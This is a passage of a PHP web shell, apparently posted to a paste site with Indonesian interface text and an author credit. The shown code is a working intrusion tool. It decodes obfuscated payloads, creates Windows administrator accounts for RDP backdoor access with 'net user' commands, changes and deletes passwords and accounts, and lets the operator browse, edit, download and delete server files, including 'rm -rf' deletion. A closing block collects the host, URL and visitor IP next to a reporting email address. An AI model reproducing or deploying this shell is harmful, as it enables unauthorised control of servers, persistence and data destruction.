  1928. break;case 'super' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
  1929. break;case 'urlencode' : $codi=rawurldecode($text);
  1930. break;case 'ur' : $codi=convert_uudecode($text);
  1931. break;case 'json' : $codi=utf8_decode(json_decode($text));
  1932. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  1933. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  1934. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  1935. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  1936. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
  1937. break;default:break;}}
  1938. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
  1939. fwrite($myfile, $codi);
  1940. fclose($myfile);
  1941. echo "<center><div id='kotakan'><br>
  1942. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
  1943. } elseif($_GET['do'] == 'krdp_shell') {
  1944.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1945.         if($_POST['create']) {
  1946.             $user = htmlspecialchars($_POST['user']);
  1947.             $pass = htmlspecialchars($_POST['pass']);
  1948.             if(preg_match("/$user/", exe("net user"))) {
  1949.                 echo "[INFO] -> <font color=red>user <font color=white>$user</font> sudah ada</font>";
  1950.             } else {
  1951.                 $add_user   = exe("net user $user $pass /add");
  1952.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  1953.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  1954.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  1955.                 echo "[ RDP ACCOUNT INFO ]<br>
  1956.                 ------------------------------<br>
  1957.                 IP: <font color=white>".$ip."</font><br>
  1958.                 Username: <font color=white>$user</font><br>
  1959.                 Password: <font color=white>$pass</font><br>
  1960.                 ------------------------------<br><br>
  1961.                 [ STATUS ]<br>
  1962.                 ------------------------------<br>
  1963.                 ";
  1964.                 if($add_user) {
  1965.                     echo "[add user] -> <font color='white'>Berhasil</font><br>";
  1966.                 } else {
  1967.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  1968.                 }
  1969.                 if($add_groups1) {
  1970.                     echo "[add localgroup Administrators] -> <font color='white'>Berhasil</font><br>";
  1971.                 } elseif($add_groups2) {
  1972.                     echo "[add localgroup Administrator] -> <font color='white'>Berhasil</font><br>";
  1973.                 } elseif($add_groups3) {
  1974.                     echo "[add localgroup Administrateur] -> <font color='white'>Berhasil</font><br>";
  1975.                 } else {
  1976.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1977.                 }
  1978.                 echo "------------------------------<br>";
  1979.             }
  1980.         } elseif($_POST['s_opsi']) {
  1981.             $user = htmlspecialchars($_POST['r_user']);
  1982.             if($_POST['opsi'] == '1') {
  1983.                 $cek = exe("net user $user");
  1984.                 echo "Checking username <font color=white>$user</font> ....... ";
  1985.                 if(preg_match("/$user/", $cek)) {
  1986.                     echo "[ <font color=white>Sudah ada</font> ]<br>
  1987.                     ------------------------------<br><br>
  1988.                     <pre>$cek</pre>";
  1989.                 } else {
  1990.                     echo "[ <font color=red>belum ada</font> ]";
  1991.                 }
  1992.             } elseif($_POST['opsi'] == '2') {
  1993.                 $cek = exe("net user $user Davnisial");
  1994.                 if(preg_match("/$user/", exe("net user"))) {
  1995.                     echo "[change password: <font color=red>Mr.4c1L Cr0tZz</font>] -> ";
  1996.                     if($cek) {
  1997.                         echo "<font color=white>Berhasil</font>";
  1998.                     } else {
  1999.                         echo "<font color=red>Gagal</font>";
  2000.                     }
  2001.                 } else {
  2002.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
  2003.                 }
  2004.             } elseif($_POST['opsi'] == '3') {
  2005.                 $cek = exe("net user $user /DELETE");
  2006.                 if(preg_match("/$user/", exe("net user"))) {
  2007.                     echo "[remove user: <font color=white>$user</font>] -> ";
  2008.                     if($cek) {
  2009.                         echo "<font color=white>Berhasil</font>";
  2010.                     } else {
  2011.                         echo "<font color=red>Gagal</font>";
  2012.                     }
  2013.                 } else {
  2014.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
  2015.                 }
  2016.             } else {
  2017.                 //
  2018.             }
  2019.         } else {
  2020.             echo "-- Create RDP --<br>
  2021.             <form method='post'>
  2022.             <input type='text' name='user' placeholder='username' value='Acil123' required>
  2023.             <input type='text' name='pass' placeholder='password' value='Acil123' required>
  2024.             <input type='submit' name='create' value='>>'>
  2025.             </form>
  2026.             -- Option --<br>
  2027.             <form method='post'>
  2028.             <input type='text' name='r_user' placeholder='username' required>
  2029.             <select name='opsi'>
  2030.             <option value='1'>Cek Username</option>
  2031.             <option value='2'>Ubah Password</option>
  2032.             <option value='3'>Hapus Username</option>
  2033.             </select>
  2034.             <input type='submit' name='s_opsi' value='>>'>
  2035.             </form>
  2036.             ";
  2037.         }
  2038.     } else {
  2039.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2040.     }
  2041. } elseif($_GET['act'] == 'newfile') {
  2042.     if($_POST['new_save_file']) {
  2043.         $newfile = htmlspecialchars($_POST['newfile']);
  2044.         $fopen = fopen($newfile, "a+");
  2045.         if($fopen) {
  2046.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2047.         } else {
  2048.             $act = "<font color=red>permission denied</font>";
  2049.         }
  2050.     }
  2051.     echo $act;
  2052.     echo "<form method='post'>
  2053.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2054.     <input type='submit' name='new_save_file' value='Submit'>
  2055.     </form>";
  2056. } elseif($_GET['act'] == 'newfolder') {
  2057.     if($_POST['new_save_folder']) {
  2058.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2059.         if(!mkdir($new_folder)) {
  2060.             $act = "<font color=red>permission denied</font>";
  2061.         } else {
  2062.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2063.         }
  2064.     }
  2065.     echo $act;
  2066.     echo "<form method='post'>
  2067.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2068.     <input type='submit' name='new_save_folder' value='Submit'>
  2069.     </form>";
  2070. } elseif($_GET['act'] == 'rename_dir') {
  2071.     if($_POST['dir_rename']) {
  2072.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2073.         if($dir_rename) {
  2074.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2075.         } else {
  2076.             $act = "<font color=red>permission denied</font>";
  2077.         }
  2078.     echo "".$act."<br>";
  2079.     }
  2080.     echo "<form method='post'>
  2081.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2082.     <input type='submit' name='dir_rename' value='rename'>
  2083.     </form>";
  2084. } elseif($_GET['act'] == 'delete_dir') {
  2085.     if(is_dir($dir)) {
  2086.         if(is_writable($dir)) {
  2087.             @rmdir($dir);
  2088.             @exe("rm -rf $dir");
  2089.             @exe("rmdir /s /q $dir");
  2090.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2091.         } else {
  2092.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2093.         }
  2094.     }
  2095.     echo $act;
  2096. } elseif($_GET['act'] == 'view') {
  2097.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2098.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2099. } elseif($_GET['act'] == 'edit') {
  2100.     if($_POST['save']) {
  2101.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2102.         if($save) {
  2103.             $act = "<font color=white>Saved!</font>";
  2104.         } else {
  2105.             $act = "<font color=red>permission denied</font>";
  2106.         }
  2107.     echo "".$act."<br>";
  2108.     }
  2109.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2110.     echo "<form method='post'>
  2111.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2112.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2113.     </form>";
  2114. } elseif($_GET['act'] == 'rename') {
  2115.     if($_POST['do_rename']) {
  2116.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2117.         if($rename) {
  2118.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2119.         } else {
  2120.             $act = "<font color=red>permission denied</font>";
  2121.         }
  2122.     echo "".$act."<br>";
  2123.     }
  2124.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2125.     echo "<form method='post'>
  2126.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2127.     <input type='submit' name='do_rename' value='rename'>
  2128.     </form>";
  2129. } elseif($_GET['act'] == 'delete') {
  2130.     $delete = unlink($_GET['file']);
  2131.     if($delete) {
  2132.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2133.     } else {
  2134.         $act = "<font color=red>permission denied</font>";
  2135.     }
  2136.     echo $act;
  2137. } else {
  2138.     if(is_dir($dir) === true) {
  2139.         if(!is_readable($dir)) {
  2140.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2141.         } else {
  2142.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2143.             <tr>
  2144.             <th class="th_home"><center>Name</center></th>
  2145.             <th class="th_home"><center>Type</center></th>
  2146.             <th class="th_home"><center>Size</center></th>
  2147.             <th class="th_home"><center>Last Modified</center></th>
  2148.             <th class="th_home"><center>Owner/Group</center></th>
  2149.             <th class="th_home"><center>Permission</center></th>
  2150.             <th class="th_home"><center>Action</center></th>
  2151.             </tr>';
  2152.             $scandir = scandir($dir);
  2153.             foreach($scandir as $dirx) {
  2154.                 $dtype = filetype("$dir/$dirx");
  2155.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2156.                 if(function_exists('posix_getpwuid')) {
  2157.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2158.                     $downer = $downer['name'];
  2159.                 } else {
  2160.                     //$downer = $uid;
  2161.                     $downer = fileowner("$dir/$dirx");
  2162.                 }
  2163.                 if(function_exists('posix_getgrgid')) {
  2164.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2165.                     $dgrp = $dgrp['name'];
  2166.                 } else {
  2167.                     $dgrp = filegroup("$dir/$dirx");
  2168.                 }
  2169.                 if(!is_dir("$dir/$dirx")) continue;
  2170.                 if($dirx === '..') {
  2171.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2172.                 } elseif($dirx === '.') {
  2173.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2174.                 } else {
  2175.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2176.                 }
  2177.                 if($dirx === '.' || $dirx === '..') {
  2178.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2179.                     } else {
  2180.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2181.                 }
  2182.                 echo "<tr>";
  2183.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2184.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2185.                 echo "<td class='td_home'><center>-</center></th></td>";
  2186.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2187.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2188.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2189.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2190.                 echo "</tr>";
  2191.             }
  2192.         }
  2193.     } else {
  2194.         echo "<font color=red>can't open directory.</font>";
  2195.     }
  2196.         foreach($scandir as $file) {
  2197.             $ftype = filetype("$dir/$file");
  2198.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2199.             $size = filesize("$dir/$file")/1024;
  2200.             $size = round($size,3);
  2201.             if(function_exists('posix_getpwuid')) {
  2202.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2203.                 $fowner = $fowner['name'];
  2204.             } else {
  2205.                 //$downer = $uid;
  2206.                 $fowner = fileowner("$dir/$file");
  2207.             }
  2208.             if(function_exists('posix_getgrgid')) {
  2209.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2210.                 $fgrp = $fgrp['name'];
  2211.             } else {
  2212.                 $fgrp = filegroup("$dir/$file");
  2213.             }
  2214.             if($size > 1024) {
  2215.                 $size = round($size/1024,2). 'MB';
  2216.             } else {
  2217.                 $size = $size. 'KB';
  2218.             }
  2219.             if(!is_file("$dir/$file")) continue;
  2220.             echo "<tr>";
  2221.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2222.             echo "<td class='td_home'><center>$ftype</center></td>";
  2223.             echo "<td class='td_home'><center>$size</center></td>";
  2224.             echo "<td class='td_home'><center>$ftime</center></td>";
  2225.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2226.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2227.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2228.             echo "</tr>";
  2229.         }
  2230.         echo "</table>";
  2231.         if(!is_readable($dir)) {
  2232.             //
  2233.         } else {
  2234.             echo "<hr>";
  2235.         }
  2236.     echo "<center>Recode ".date("Y")." - <a href='www.facebook.com/OfficialPacmanCorpTeam/' target='_blank'><font color=gold>Mr.4c1L Cr0tZz</font></a></center>";
  2237. }
  2238. ?>
  2239. <?php
  2240. $ip = getenv("REMOTE_ADDR");
  2241. $ken = rand(1, 99999);
  2242. $subj98 = " Result shell bouz |$ken";
  2243. $email = "acilcrotz@gmail.com";
  2244. $from = "From: akusangemaz@gmail.com";
  2245. $tot = $_SERVER['REQUEST_URI'];
  2246. $kon = $_SERVER['HTTP_HOST'];
  2247. $tol = $ip . "";
  2248. $msg8873 = "$tot $kon $tol";
  2249. ?>
  2250. <br>
  2251. </center>
  2252. <iframe width='1' height='1' src='https://www.youtube.com/embed/wnKuS60sjos?rel=0&autoplay=1&loop=1&playlist=8nA-apwq0aY'
  2253. frameborder='0' allowfullscreen></iframe>
  2254. </body>
  2255. <tbody>
  2256. </html>
Add Comment
Please, Sign In to add comment